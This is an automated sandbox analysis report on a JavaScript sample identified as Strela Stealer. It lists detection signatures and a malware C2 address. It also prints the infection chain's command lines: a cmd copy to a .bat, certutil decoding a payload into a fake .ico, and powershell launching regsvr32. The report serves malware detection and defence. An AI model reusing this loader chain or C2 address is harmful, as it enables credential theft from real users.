Edit tour

Windows Analysis Report
file.js

Overview

General Information

Sample name:	file.js
Analysis ID:	1417160
MD5:	2ecfb5962169fd0cd5481a5bdfa56bba
SHA1:	9e97ed9944bc0442554b423009f1b4950811a4fc
SHA256:	b50491831cb3674fcdb34933ad61d233ac2cc275ac396d00f7257f9bc0328a97
Tags:	js
Infos:

Detection

Strela Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

Yara detected Strela Stealer

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Yara detected EXE embedded in BAT file

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Scripting/CommandLine Process Spawned Regsvr32

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6736 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 6908 cmdline: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7080 cmdline: wmic path win32_operatingsystem get oslanguage MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

find.exe (PID: 7084 cmdline: find /i "1033" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

findstr.exe (PID: 7156 cmdline: findstr /V joyousintroducebreezy ""C:\Users\user\\stiffrelievedawesome.bat"" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

certutil.exe (PID: 6180 cmdline: certutil -f -decode deepdidacticfour childlikeclearintroduce.ico MD5: F17616EC0522FC5633151F7CAA278CAA)

powershell.exe (PID: 5500 cmdline: powershell regsvr32 childlikeclearintroduce.ico MD5: 04029E121A0CFA5991749937DD22A1D9)

regsvr32.exe (PID: 5460 cmdline: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

cleanup

Malware Configuration

Threatname: Strela Stealer

{"C2 url": "45.9.74.12/server.php"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
file.js	JoeSecurity_EXEembeddedinBATfile	Yara detected EXE embedded in BAT file	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\stiffrelievedawesome.bat	JoeSecurity_EXEembeddedinBATfile	Yara detected EXE embedded in BAT file	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
Process Memory Space: regsvr32.exe PID: 5460	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
8.2.regsvr32.exe.7ffe1023e734.1.unpack	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
8.2.regsvr32.exe.7ffe1023e734.1.raw.unpack	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
8.2.regsvr32.exe.7ffe10230000.0.unpack	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, CommandLine: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: powershell regsvr32 childlikeclearintroduce.ico, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5500, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, ProcessId: 5460, ProcessName: regsvr32.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", ProcessId: 6736, ProcessName: wscript.exe

Sigma detected: Scripting/CommandLine Process Spawned Regsvr32

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, CommandLine: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: powershell regsvr32 childlikeclearintroduce.ico, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5500, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, ProcessId: 5460, ProcessName: regsvr32.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat", CommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6736, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat", ProcessId: 6908, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", ProcessId: 6736, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell regsvr32 childlikeclearintroduce.ico, CommandLine: powershell regsvr32 childlikeclearintroduce.ico, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6908, ParentProcessName: cmd.exe, ProcessCommandLine: powershell regsvr32 childlikeclearintroduce.ico, ProcessId: 5500, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: powershell regsvr32 childlikeclearintroduce.ico, CommandLine: powershell regsvr32 childlikeclearintroduce.ico, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6908, ParentProcessName: cmd.exe, ProcessCommandLine: powershell regsvr32 childlikeclearintroduce.ico, ProcessId: 5500, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: 45.9.74.12/server.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 8.2.regsvr32.exe.7ffe10230000.0.unpack

Malware Configuration Extractor: Strela Stealer {"C2 url": "45.9.74.12/server.php"}

Multi AV Scanner detection for submitted file

Source: file.js

ReversingLabs: Detection: 21%

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.9.74.12/server.php

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 childlikeclearintroduce.ico
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 childlikeclearintroduce.ico	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02B8EE88	8_2_02B8EE88
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02B81240	8_2_02B81240
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02B81740	8_2_02B81740
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02B86C5C	8_2_02B86C5C

Source: file.js

Initial sample: Strings found which are bigger than 50

Source: childlikeclearintroduce.ico.6.dr

Static PE information: Number of sections : 19 > 10

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winJS@16/7@0/0

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\stiffrelievedawesome.bat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gw4xkmxd.b3h.ps1

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.js

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_operatingsystem get oslanguage
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "1033"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V joyousintroducebreezy ""C:\Users\user\\stiffrelievedawesome.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode deepdidacticfour childlikeclearintroduce.ico
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 childlikeclearintroduce.ico
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_operatingsystem get oslanguage	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "1033"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V joyousintroducebreezy ""C:\Users\user\\stiffrelievedawesome.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode deepdidacticfour childlikeclearintroduce.ico	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 childlikeclearintroduce.ico	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell");IHost.ScriptFullName();IWshShell3.Run("cmd /k copy "C:\Users\user\Desktop\file.js" "%userprofile%\\stiffrelieved", "0", "false")

Yara detected EXE embedded in BAT file

Source: Yara match	File source: file.js, type: SAMPLE
Source: Yara match	File source: C:\Users\user\stiffrelievedawesome.bat, type: DROPPED

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFE102314B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00007FFE102314B0

Source: childlikeclearintroduce.ico.6.dr	Static PE information: section name: /4
Source: childlikeclearintroduce.ico.6.dr	Static PE information: section name: .xdata
Source: childlikeclearintroduce.ico.6.dr	Static PE information: section name: /14
Source: childlikeclearintroduce.ico.6.dr	Static PE information: section name: /29
Source: childlikeclearintroduce.ico.6.dr	Static PE information: section name: /41
Source: childlikeclearintroduce.ico.6.dr	Static PE information: section name: /55
Source: childlikeclearintroduce.ico.6.dr	Static PE information: section name: /67
Source: childlikeclearintroduce.ico.6.dr	Static PE information: section name: /80
Source: childlikeclearintroduce.ico.6.dr	Static PE information: section name: /91

Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02B8C5EF push esp; ret	8_2_02B8C5F5
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02B8C5CC push cs; ret	8_2_02B8C5CD
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02B9753E push ecx; retf 003Fh	8_2_02B9759E
Source: C:\Windows\System32\regsvr32.exe	Code function: 8_2_02B8B542 push esp; ret	8_2_02B8B545

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\user\childlikeclearintroduce.ico

Jump to dropped file

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\user\childlikeclearintroduce.ico

Jump to dropped file

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\user\childlikeclearintroduce.ico

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\certutil.exe

